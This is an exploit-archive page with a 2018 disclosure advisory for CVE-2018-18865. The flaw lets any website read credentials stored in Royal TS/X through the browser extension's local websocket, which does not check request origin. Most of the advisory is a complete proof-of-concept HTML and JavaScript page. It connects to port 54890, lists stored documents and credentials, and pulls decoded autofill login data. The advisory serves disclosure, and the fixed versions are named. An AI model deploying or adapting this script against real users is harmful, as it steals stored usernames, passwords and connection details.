Twenty Year Anniversary

Royal TS/X Information Disclosure

Royal TS/X Information Disclosure
Posted Nov 2, 2018
Authored by Jakub Palaczynski

Royal TS/X suffer from an information disclosure vulnerability. Versions that addressed this issue are Royal TSX (for macOS) 3.3.1 released on 2018-09-13 and Royal TS (for Windows) 4.3.60728 released on 2018-07-28.

tags | exploit, info disclosure
advisories | CVE-2018-18865
MD5 | 6b1c38de2392e49aa7ef8b0d81ea21f9

Royal TS/X Information Disclosure

Change Mirror Download
Title: Royal TS/X - Information Disclosure
Author: Jakub Palaczynski
Date: 10. July 2018
CVE: CVE-2018-18865

Affected product:
=============

Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta


Vulnerability - Information Disclosure:
=============================

Any third party web application can steal credentials created in Royal TS/X
when browser extension is enabled.
Browser extension communicates using websockets (default TCP port 54890)
and websockets do not use any validation to verify origin of the request.


PoC website:
==========

<!DOCTYPE html>
<meta charset="utf-8" />
<title>RoyalTS/X Exploit</title>
<script language="javascript" type="text/javascript">

var wsUri = "ws://127.0.0.1:54890/";
var output;

function init()
{
output = document.getElementById("output");
testWebSocket();
}

function testWebSocket()
{
writeToScreen("Let's retrieve some data...");
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}

function onOpen(evt,message)
{
doSend(message);
}

function onClose(evt)
{
}

function onMessage(evt)
{
var obj = JSON.parse(evt.data);
if (obj['Command'] == "GetDocuments") {
for (var x in obj['ResponseData']){
writeToScreen("Name: " + obj['ResponseData'][x]['Name']);
writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);
for (var y in obj['ResponseData'][x]['Credentials']){
writeToScreen("Username: " +
obj['ResponseData'][x]['Credentials'][y]['UserName']);
writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);
if (obj['ResponseData'][x]['Unlocked'] == true){
websocket.close();
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""
+ obj['ResponseData'][x]['Credentials'][y]['ID'] +
"\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
}
}
}
else {
if (obj['Command'] == "GetLoginInformation") {
var obj = JSON.parse(evt.data);
writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));
}
}
}

function onError(evt)
{
writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
}

function doSend(message)
{
websocket.send(message);
}

function writeToScreen(message)
{
var pre = document.createElement("p");
pre.style.wordWrap = "break-word";
pre.innerHTML = message;
output.appendChild(pre);
}

window.addEventListener("load", init, false);

</script>

<h2>RoyalTS/X Exploit</h2>

<div id="output"></div>


Contact:
=======

Jakub[dot]Palaczynski[at]gmail[dot]com


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    10 Files
  • 2
    Nov 2nd
    15 Files
  • 3
    Nov 3rd
    2 Files
  • 4
    Nov 4th
    2 Files
  • 5
    Nov 5th
    32 Files
  • 6
    Nov 6th
    27 Files
  • 7
    Nov 7th
    8 Files
  • 8
    Nov 8th
    9 Files
  • 9
    Nov 9th
    17 Files
  • 10
    Nov 10th
    2 Files
  • 11
    Nov 11th
    2 Files
  • 12
    Nov 12th
    33 Files
  • 13
    Nov 13th
    4 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close